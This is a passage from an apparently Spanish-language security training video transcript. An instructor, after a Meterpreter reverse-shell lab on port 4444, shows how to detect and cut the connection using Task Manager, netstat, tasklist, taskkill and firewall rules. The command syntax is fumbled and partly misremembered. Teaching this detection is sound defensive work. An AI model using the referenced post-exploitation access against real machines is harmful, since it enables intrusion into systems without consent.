¿cierto? Y hacer un system info. Y esto me va a entregar, ¿cierto? Información sobre todo el sistema, ¿ya? Desde el direccionamiento IP, la MAC,
hasta las actualizaciones y los parches que tiene instalado este equipo, ¿cierto? Y información sobre el hardware y el software. Sacar un montón de información. Ya. Luego, ¿cómo nos defendemos? ¿Cierto? La otra parte. El otro reverso. Primero, fíjese usted que yo aquí, primero, solo a través del Task Manager ya puedo tener un par de ideas de lo que está pasando. Fíjese, si bien yo no veo el proceso de frutilla.exe, fíjese que yo aquí tengo abierta una consola, ¿ya? Dice Windows, proceso de comandos. Fíjese usted que yo tengo abierto un CMD, y aquí yo no tengo un CMD, no lo veo, ¿ya? Entonces, eso significa que yo tengo ahí abierto un proceso que no corresponde, ¿ya? Entonces, yo podría aquí terminar ese proceso. Para que veamos, aquí, en un segundo. ¿Sí? Yo podría terminar ese proceso, end process. ¿Ya? Fíjese que lo boté, ¿cierto? Pero no le he cerrado la conexión del Meterpreter, ¿ya? ¿Por qué? Porque cerré la línea de comando, yo la podría volver a abrir. ¿Ya? Yo la podría volver a abrir. Entonces, fíjese usted, ¿cierto? Que si bien yo aquí puedo interrumpir algunos procesos, no tengo a la vista el proceso de origen. ¿Ya? Entonces vamos a buscarlo. Yo voy a entrar, ¿cierto? Aquí a CMD y voy a hacer un netstat AON. Y fíjese que yo aquí tengo a la vista todos los procesos, ¿cierto? Que están ejecutándose, ¿ya? Ahora, de todos estos procesos, ¿cierto? Lo que corresponde, lo que me está mostrando el sistema es el protocolo, TCP/UDP, el origen, ¿cierto? Que el origen suelo ser yo, ¿cierto? Y el destino, es decir, hacia dónde va. El estado, ¿cierto? A la escucha significa que está esperando por establecer una conexión. Established significa que se está, ¿cierto? Transfiriendo información, hay una conexión activa. Y el PID, ¿cierto? Que es este de acá, ya, el ID del proceso. Ahora, fíjese que aquí hay algo raro. Yo tengo una conexión TCP, ¿cierto? Que tiene puerto, conexión de origen, yo, y en el destino hay una IP que yo no conozco, que es parte de esta misma red, hacia el puerto 4444. Y me dice que el PID es el 1892. Vamos a buscarlo, ¿cierto? Me vengo acá, servicios, PID 1892, ¿cierto? No está, ya, no está aquí. Entonces lo vamos a llamar a la fuerza. Task list. Help, porque no me acuerdo cómo se hacía el... No, task list -h. Task list. 1892. Ya, déjeme ver, un segundo. Acá. Aquí, con un EC, ¿cierto? Con un EC. Entonces, yo podría construir, ¿cierto? Yo podría construir, ¿cierto? Un... Acá, ¿cierto? Ya estoy medio oxidado en esta cuestión, no se lo olvida con el tiempo. Podría construir un task list de EC. ¿Cuál era el PID que vimos? 1892 creo que era. 1892. PID. No. No, ya no me acuerdo. Ya no me acuerdo cómo utilizar los filtros. Sí, creo que era. PID. ¿Con guión? Nah. No, ya no me acuerdo. Ya. Pero... busquemos. Cuando a usted se le olvida algún comando, siempre está su querido y buen amigo ChatGPT, ¿cierto? Entonces, CMD, utilizar línea de comando de CMD, ¿cierto? Para filtrar un
task list y buscar el PID 1892, ¿cierto? Aquí me va a dar el comando específico, ¿ya? Ahí está, con un pipe, ya. Entonces, task list, ¿cierto? Hago el pipe y es find str 1892. No está, ¿cierto? No me lo detecta, ¿ya? Probablemente eso significa que aquí hay algo escondido cochino, ¿cierto? Que yo no quiero. Entonces, debería terminarlo, ¿cierto? Entonces, venir acá, ¿cierto? Y esto lo hago con un kill, si la memoria no me falla. Kill o... sí, kill 1892. No. No, es kill en Linux, es kill. Pero acá en Windows, ¿cierto? En Windows es... Oh, se me olvidaron los comandos. Ya, no, chat query. Amigo, ven amigo. Amigo, ven a mí. Terminar proceso. Task kill. Ya. Entonces, task kill, ¿cierto? Y ahí está, ¿cierto? Me dice sintaxis inválida, vamos a revisar las opciones, ¿cierto? Entonces me dice que puedo hacerlo por PID, ¿ya? Entonces, task kill 1892, ¿cierto? ¿No? Ah, por PID, obvio, ya. Entonces tengo que filtrar, ¿cierto? Task kill PID 1892. Dice que el proceso 1892 no existe, ¿cierto? Ya, eso se debe a que el proceso está ofuscado, ¿ya? Ahora, para poder encontrar el proceso ofuscado, fíjese usted, 1892, yo tendría que entrar a buscar entre los subprocesos, ¿ya? Desafortunadamente, a mano, eso no lo vamos a poder hacer, ¿ya? Vamos a tener que utilizar algún sistema, ¿cierto? Anti-malware, ¿correcto? O algún sistema de monitoreo que nos permita, ¿cierto? Reconocer los servicios, ¿ya? Pero eventualmente cuando nosotros hagamos eso va a llegar al sistema, ¿cierto? Lo va a encontrar y podríamos interrumpir, ¿cierto? La conexión. Ahora, yo sé que está acá, ¿cierto? Yo sé que está aquí, pero fíjese que yo no puedo interrumpir este proceso sin echarme, ¿cierto? El sistema, ¿ya? ¿Por qué? Porque estoy interrumpiendo el Explorer, ¿ya? Entonces, murió Windows, ¿cierto? O sea, no murió Windows, pero por lo menos los procesos en estos momentos están interrumpidos, ¿cierto? Pero también acá, ¿cierto? Se cayó la sesión, ¿ya? Yo aquí ya no tengo sesión abierta, ¿cierto? No tengo nada que hacer. Ahora, otra forma en la que podríamos, ¿cierto?, haber protegido esto, ¿cierto?, es a través de reglas de firewall, ¿cierto? Cortar los puertos de salida, cortar las conexiones hacia el puerto 44, y también hubiese funcionado, ¿cierto? Pero, bueno, eso, ¿cierto?, son algunas de las cosas que vamos a revisar, ¿cierto? En el próximo video vamos a ver cómo hacer un par de explotaciones web, ¿cierto? Sigan practicando, ¿cierto? Estas cosas requieren conocimiento técnico y mucha práctica. Así que nos vemos, chicos. Que tengan buena tarde.